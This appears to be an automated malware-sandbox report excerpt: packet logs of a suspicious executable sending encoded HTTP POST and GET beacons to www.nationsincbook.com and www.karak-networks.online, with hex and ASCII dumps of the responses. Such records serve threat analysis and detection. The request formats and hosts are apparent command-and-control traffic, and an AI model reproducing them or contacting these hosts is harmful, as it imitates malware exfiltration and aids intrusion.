                                              Data Raw: 35 48 45 3d 68 5a 76 34 51 78 68 30 42 39 68 71 38 2b 6d 6d 73 79 4e 64 6e 44 43 31 42 50 56 37 67 6a 36 72 77 46 78 42 4e 2f 73 37 74 6e 35 72 4c 54 5a 6c 4c 56 58 39 6d 58 69 48 75 61 52 44 4d 53 58 6c 77 53 79 48 37 49 4a 37 58 74 62 34 58 75 6f 46 6b 44 4f 74 36 56 61 6e 76 6a 70 44 46 30 72 39 63 50 30 53 51 2f 76 7a 33 4e 76 71 62 6a 37 2b 6b 39 2f 45 68 7a 31 4c 43 2f 2f 55 4b 73 7a 58 4c 4b 43 4f 4f 70 72 70 66 62 4f 47 4b 35 50 73 65 7a 31 47 39 2f 44 73 4e 36 59 62 32 30 2b 56 30 5a 47 4e 48 48 44 4f 72 30 62 37 35 72 71 31 5a 65 4b 7a 51 75 68 59 31 56 47 50 65 31 4e 32 68 4a 79 33 77 32 76 77 64 55 4a 30 50 41 33 45 4a 51 3d 3d
                                              Data Ascii: 5HE=hZv4Qxh0B9hq8+mmsyNdnDC1BPV7gj6rwFxBN/s7tn5rLTZlLVX9mXiHuaRDMSXlwSyH7IJ7Xtb4XuoFkDOt6VanvjpDF0r9cP0SQ/vz3Nvqbj7+k9/Ehz1LC//UKszXLKCOOprpfbOGK5Psez1G9/DsN6Yb20+V0ZGNHHDOr0b75rq1ZeKzQuhY1VGPe1N2hJy3w2vwdUJ0PA3EJQ==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.7497473.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:54.348809958 CEST747OUTPOST /ka5q/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.nationsincbook.com
                                              Origin: http://www.nationsincbook.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.nationsincbook.com/ka5q/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 68 5a 76 34 51 78 68 30 42 39 68 71 2b 61 61 6d 74 51 6c 64 32 6a 43 32 4e 76 56 37 71 44 36 76 77 46 74 42 4e 39 41 56 73 52 70 72 49 78 78 6c 5a 45 58 39 6c 58 69 48 32 71 52 43 52 43 57 6e 77 53 2b 35 37 4a 31 37 58 74 50 34 58 73 77 46 6e 79 4f 73 35 6c 61 70 70 6a 6f 46 59 6b 72 39 63 50 30 53 51 38 53 63 33 4e 33 71 62 53 72 2b 6c 63 2f 4c 39 44 31 4b 48 2f 2f 55 4f 73 7a 54 4c 4b 44 5a 4f 72 66 50 66 5a 47 47 4b 39 48 73 65 48 70 46 7a 2f 44 75 42 71 5a 52 77 55 2f 33 38 4a 43 4e 65 33 7a 4e 6d 48 48 50 34 64 33 58 44 38 47 66 4f 2f 5a 6a 78 58 69 35 4a 54 51 44 6a 49 32 76 39 55 62 52 43 6a 73 65 43 53 57 41 66 6b 2b 68 54 34 47 45 54 51 48 34 36 74 68 78 49 47 78 42 51 30 49 3d
                                              Data Ascii: 5HE=hZv4Qxh0B9hq+aamtQld2jC2NvV7qD6vwFtBN9AVsRprIxxlZEX9lXiH2qRCRCWnwS+57J17XtP4XswFnyOs5lappjoFYkr9cP0SQ8Sc3N3qbSr+lc/L9D1KH//UOszTLKDZOrfPfZGGK9HseHpFz/DuBqZRwU/38JCNe3zNmHHP4d3XD8GfO/ZjxXi5JTQDjI2v9UbRCjseCSWAfk+hT4GETQH46thxIGxBQ0I=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.7497483.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:57.177315950 CEST1760OUTPOST /ka5q/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.nationsincbook.com
                                              Origin: http://www.nationsincbook.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.nationsincbook.com/ka5q/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 68 5a 76 34 51 78 68 30 42 39 68 71 2b 61 61 6d 74 51 6c 64 32 6a 43 32 4e 76 56 37 71 44 36 76 77 46 74 42 4e 39 41 56 73 52 68 72 4c 41 52 6c 4c 33 50 39 72 33 69 48 2f 4b 52 66 52 43 57 6d 77 53 57 39 37 4a 35 46 58 75 33 34 56 4e 51 46 7a 51 71 73 75 56 61 70 6b 44 6f 56 46 30 72 6f 63 50 6b 6f 51 2f 36 63 33 4e 33 71 62 52 6a 2b 78 39 2f 4c 2f 44 31 4c 43 2f 2f 49 4b 73 79 47 4c 4b 71 73 4f 72 4b 79 66 4e 4b 47 4c 64 58 73 63 55 42 46 73 76 44 6f 41 61 59 45 77 55 7a 42 38 4a 66 32 65 33 33 72 6d 46 58 50 36 59 47 41 66 4f 75 39 59 2b 49 33 34 6d 2b 4a 50 41 52 2b 69 72 53 51 79 32 6e 57 4f 78 77 31 42 77 47 49 53 43 33 46 4f 61 6d 72 63 68 54 77 36 39 5a 2b 55 6b 5a 67 46 78 51 55 53 58 6c 49 71 50 78 5a 75 56 6e 36 53 4c 41 59 52 32 31 68 75 34 69 78 64 67 43 6e 32 55 58 6b 2f 51 6c 68 63 5a 53 4f 70 35 2f 4c 44 59 74 34 4f 72 30 4e 37 41 67 53 31 32 6f 46 6a 72 57 43 41 2f 4d 63 7a 4d 36 34 6c 64 52 77 54 43 6c 70 6c 58 54 54 39 4e 62 36 33 4b 4d 39 70 6f 50 38 35 34 6b 66 54 47 [TRUNCATED]
                                              Data Ascii: 5HE=hZv4Qxh0B9hq+aamtQld2jC2NvV7qD6vwFtBN9AVsRhrLARlL3P9r3iH/KRfRCWmwSW97J5FXu34VNQFzQqsuVapkDoVF0rocPkoQ/6c3N3qbRj+x9/L/D1LC//IKsyGLKqsOrKyfNKGLdXscUBFsvDoAaYEwUzB8Jf2e33rmFXP6YGAfOu9Y+I34m+JPAR+irSQy2nWOxw1BwGISC3FOamrchTw69Z+UkZgFxQUSXlIqPxZuVn6SLAYR21hu4ixdgCn2UXk/QlhcZSOp5/LDYt4Or0N7AgS12oFjrWCA/MczM64ldRwTClplXTT9Nb63KM9poP854kfTG2QqXFsPNwF9NBAh0az/KuQxrRrQc7ZHye2nBCD41QsQU7XtJ7hkMLLwEj1LXAoEZWmPG5LS8cMr2aV+Xih8syhvLNF7qUijD91slpE7xqokblI+f3mkB4hzUlSrnz2VbApzk2z1msRNz0BG9008fLOIbv3VKm8L88kUR+lzPKZ6kgUH+8otNXq+rRgLVYV9ssFlkg1w/z7oKve0uLE0zJk+PzGvmls/iusD5g8eJ7QIbtZv0oRn75p8tD1FAlKtEk2IrVqmhte8CYS5blwOFWq4YTPI0lUDLjbz0hIMn3rNARWXlX6XyBCAv3sL++ktF+oFGKjxOt8Ix1WHcEqvYxIMsvU1ntv8ptdmBhEgewTvEjf3xic/t4gi21LEtpr1S+HUBDz4FNfvuqchclonZw+O92AG/ibw9OSOgyMRdlaGcx6GBXhKZ9g9wbzAWXVcY5YqaqsABAOOrqEcySV0kc1XEPaythpptBTGs59Zybmq2rG6zMvU4eDfmTb01SfWyZghO0hP8gaN73URoRkRIigtsbRQS7gYJjjBtju0hqRr6z14XSpoPP/0MnwCMxNGLygx8g+t3pGcPP0F8sAcefAw5l0HLmo6uFTXO7iGJyaLrqWntPyHFrbVullQb/z42GMvQdf7KyA1P162L/IrR4fjRxjOazVpuEt [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.7497493.33.130.190806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:33:59.851136923 CEST452OUTGET /ka5q/?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.nationsincbook.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:34:00.273647070 CEST412INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Sun, 21 Jul 2024 11:34:00 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 35 48 45 3d 73 62 48 59 54 42 56 4d 4f 2b 5a 4e 33 63 69 6d 6c 53 64 64 68 57 79 78 4f 64 39 2b 72 79 71 44 77 55 52 66 47 70 30 7a 74 42 73 78 42 55 31 62 66 58 54 78 68 6d 48 49 7a 36 64 57 4b 6e 50 69 35 56 53 6f 78 2b 39 6b 59 2f 76 76 65 38 63 5a 6b 54 48 70 75 56 79 62 6a 44 4a 48 61 41 2f 4d 65 4d 55 37 5a 2f 4b 6c 34 73 72 53 64 53 44 37 6b 61 4c 37 39 45 4d 36 42 4f 6a 4a 4f 64 2f 58 45 6f 65 39 51 72 66 58 4c 39 4f 36 26 55 58 52 3d 6b 54 50 38 58 66 49 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?5HE=sbHYTBVMO+ZN3cimlSddhWyxOd9+ryqDwURfGp0ztBsxBU1bfXTxhmHIz6dWKnPi5VSox+9kY/vve8cZkTHpuVybjDJHaA/MeMU7Z/Kl4srSdSD7kaL79EM6BOjJOd/XEoe9QrfXL9O6&UXR=kTP8XfI8"}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.74975084.32.84.32806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:34:22.745959997 CEST736OUTPOST /2afv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.karak-networks.online
                                              Origin: http://www.karak-networks.online
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.karak-networks.online/2afv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 73 4a 77 64 46 72 6c 74 30 53 6e 31 48 49 64 53 49 47 69 58 69 78 52 55 37 2f 58 41 48 7a 50 4a 53 58 62 66 51 61 4e 72 5a 33 51 67 5a 61 62 63 71 37 36 59 57 64 71 37 67 67 55 76 57 75 72 7a 53 59 6b 4d 46 74 6d 34 50 4f 2f 63 44 2b 71 54 7a 61 79 65 61 62 62 72 31 2f 35 4c 65 36 6d 5a 6e 76 58 56 5a 33 35 4c 61 6f 42 76 39 39 65 46 61 30 49 76 59 4c 6e 33 53 66 41 73 66 35 4c 7a 53 4a 41 77 43 72 65 46 4b 66 75 65 75 30 2f 2f 59 4a 4f 31 37 44 41 77 6b 4f 55 70 4b 38 46 47 38 78 6d 5a 63 50 44 79 6d 5a 36 5a 79 51 47 39 61 51 4f 4e 49 38 4f 35 54 4e 4c 50 7a 5a 57 61 6d 4c 36 41 35 54 5a 66 48 77 74 32 46 4c 52 42 4c 51 3d 3d
                                              Data Ascii: 5HE=sJwdFrlt0Sn1HIdSIGiXixRU7/XAHzPJSXbfQaNrZ3QgZabcq76YWdq7ggUvWurzSYkMFtm4PO/cD+qTzayeabbr1/5Le6mZnvXVZ35LaoBv99eFa0IvYLn3SfAsf5LzSJAwCreFKfueu0//YJO17DAwkOUpK8FG8xmZcPDymZ6ZyQG9aQONI8O5TNLPzZWamL6A5TZfHwt2FLRBLQ==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.74975184.32.84.32806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:34:25.285720110 CEST756OUTPOST /2afv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.karak-networks.online
                                              Origin: http://www.karak-networks.online
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.karak-networks.online/2afv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 73 4a 77 64 46 72 6c 74 30 53 6e 31 45 70 4e 53 4a 68 32 58 6b 52 52 58 6e 76 58 41 4e 54 50 4e 53 58 58 66 51 65 38 75 59 45 6b 67 61 37 72 63 72 36 36 59 54 64 71 37 71 41 55 75 62 4f 72 43 53 59 67 69 46 6f 6d 34 50 4f 44 63 44 36 75 54 7a 4e 6d 5a 4c 62 62 70 7a 2f 35 7a 41 4b 6d 5a 6e 76 58 56 5a 33 74 78 61 73 56 76 39 4e 4f 46 62 57 67 73 62 4c 6e 30 56 66 41 73 4f 4a 4c 33 53 4a 41 4f 43 75 2b 2f 4b 64 6d 65 75 32 33 2f 5a 62 32 32 69 7a 41 71 36 2b 56 74 4e 38 78 4b 34 43 2f 68 5a 75 4b 70 2f 72 32 59 7a 6d 62 66 41 79 43 68 57 74 32 43 58 50 76 35 6b 2f 4c 76 6b 4b 2b 59 30 78 74 2b 59 48 49 63 49 5a 77 46 64 74 69 49 7a 6c 73 4c 66 31 53 72 6d 72 31 73 31 31 32 5a 36 75 38 3d
                                              Data Ascii: 5HE=sJwdFrlt0Sn1EpNSJh2XkRRXnvXANTPNSXXfQe8uYEkga7rcr66YTdq7qAUubOrCSYgiFom4PODcD6uTzNmZLbbpz/5zAKmZnvXVZ3txasVv9NOFbWgsbLn0VfAsOJL3SJAOCu+/Kdmeu23/Zb22izAq6+VtN8xK4C/hZuKp/r2YzmbfAyChWt2CXPv5k/LvkK+Y0xt+YHIcIZwFdtiIzlsLf1Srmr1s112Z6u8=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.74975284.32.84.32806392C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:34:27.816030025 CEST1769OUTPOST /2afv/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.karak-networks.online
                                              Origin: http://www.karak-networks.online
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.karak-networks.online/2afv/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 73 4a 77 64 46 72 6c 74 30 53 6e 31 45 70 4e 53 4a 68 32 58 6b 52 52 58 6e 76 58 41 4e 54 50 4e 53 58 58 66 51 65 38 75 59 45 38 67 5a 4e 2f 63 70 5a 53 59 51 64 71 37 30 51 55 72 62 4f 72 62 53 5a 45 75 46 6f 69 33 50 4c 50 63 4d 2f 36 54 6b 49 61 5a 53 4c 62 70 78 2f 35 49 65 36 6d 32 6e 73 76 4b 5a 33 39 78 61 73 56 76 39 4c 79 46 50 30 49 73 64 4c 6e 33 53 66 41 72 66 35 4c 50 53 4a 34 65 43 75 7a 41 4a 73 47 65 75 57 6e 2f 56 49 4f 32 72 7a 41 30 37 2b 56 4c 4e 38 73 55 34 42 61 59 5a 75 2f 38 2f 72 4f 59 2b 54 72 45 61 47 4f 72 4b 64 6a 44 5a 4a 72 31 6e 66 44 61 36 70 48 6b 71 68 68 65 61 6e 70 6a 4d 66 63 36 66 39 33 6f 7a 56 6b 38 63 78 6d 37 70 64 67 34 75 47 2b 34 73 72 72 56 72 66 75 36 59 70 68 33 41 76 39 78 61 4a 69 2b 74 35 55 63 37 68 6a 4c 6a 43 56 73 73 31 61 2f 33 36 59 6f 57 48 54 72 61 48 35 54 41 70 44 75 6a 69 70 68 44 47 45 76 4a 6e 75 6c 47 63 32 34 48 36 76 71 67 54 61 31 48 52 70 78 64 73 67 66 44 56 6a 6b 49 57 73 61 34 7a 67 69 7a 68 71 70 4a 41 6e 62 69 57 [TRUNCATED]
                                              Data Ascii: 5HE=sJwdFrlt0Sn1EpNSJh2XkRRXnvXANTPNSXXfQe8uYE8gZN/cpZSYQdq70QUrbOrbSZEuFoi3PLPcM/6TkIaZSLbpx/5Ie6m2nsvKZ39xasVv9LyFP0IsdLn3SfArf5LPSJ4eCuzAJsGeuWn/VIO2rzA07+VLN8sU4BaYZu/8/rOY+TrEaGOrKdjDZJr1nfDa6pHkqhheanpjMfc6f93ozVk8cxm7pdg4uG+4srrVrfu6Yph3Av9xaJi+t5Uc7hjLjCVss1a/36YoWHTraH5TApDujiphDGEvJnulGc24H6vqgTa1HRpxdsgfDVjkIWsa4zgizhqpJAnbiW1uP7Z/5Xb3rfuFbJQflrbyBjqgr/C26Z6vgWTQwUZk7tvCzJBMnVpvCgVI+4psEhvZnCbQESbkSbL7iruc8DiSjNY/Ungg0z+DS8rVDIT7Dp7TCrhtcpvZRtXQa/KmWz++CKnvKqtWgmCcNGPR8awgFpIH55R7prO9350qKcOaashTGV2SsgLpZNV0iLTFd2kW4L+8qC/sfXcPPYcKTMxNqwLQllpWwPUaUBCC3SARGitfkl/h7phM5GrebNBCkk2Jl40FR5JYztNAyiRLD/qxETXxN5NE8+MqWHd5YspJH1wZJaYpAluie5fvc1gKhHXjaUqeL30UiemusJwNDbUdooGtGyaMZjO7V9kZD/JXPNoeLH0VluNDV6Yh7AmLVL28mbSpgLQp99vCWO1hNuvmc54v70w/OAYDqvazewIKQ1Iz4KSWcOBsPtk/vDGJxDeopNnKAFtKmOPmq8Zd6yIacrlwMw9NN/aEP0h/MCRlt9YpEFDwoNa9oXBTxLif1tqvgKDTTyehiivNXyzf6uwxnpdReABgYOvjNVkOacV1cCXcdhAU1Csjasw1dZm3NE8GggOtmrO2+O2RdZV2yoiewBrc9xAJB8qz1XjMXeYC7TBeNMV/Cv/FFwRIKkwChVlGTpLdgTRodC9OS47JFO+hej2Gwkh+9+1n [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              48192.168.2.74975384.32.84.3280
                                              TimestampBytes transferredDirectionData
                                              Jul 21, 2024 13:34:31.720243931 CEST455OUTGET /2afv/?5HE=hLY9GbFjrTr/Z7Z1J1n+8mxvovTjHVjaQ1TETPlxVVMVYtq2nLqFQ+qvrj4cFtmldoUiHIajNLHyMvL4kY+KeK3n/v9QeqmigNuoWlpmTNFJx52laQwxR7zETdE9Da/cctIuDpSkBIav&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.karak-networks.online
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:34:32.187755108 CEST1236INHTTP/1.1 200 OK
                                              Server: hcdn
                                              Date: Sun, 21 Jul 2024 11:34:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 10072
                                              Connection: close
                                              Vary: Accept-Encoding
                                              alt-svc: h3=":443"; ma=86400
                                              x-hcdn-request-id: 04598f4962530f157d4568d79490180a-bos-edge3
                                              Expires: Sun, 21 Jul 2024 11:34:31 GMT
                                              Cache-Control: no-cache
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                              Jul 21, 2024 13:34:32.187872887 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                              Jul 21, 2024 13:34:32.188110113 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                              Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                              Jul 21, 2024 13:34:32.188184977 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                              Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                              Jul 21, 2024 13:34:32.188218117 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                              Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                              Jul 21, 2024 13:34:32.188234091 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                              Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                              Jul 21, 2024 13:34:32.188251019 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                              Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                              Jul 21, 2024 13:34:32.188268900 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
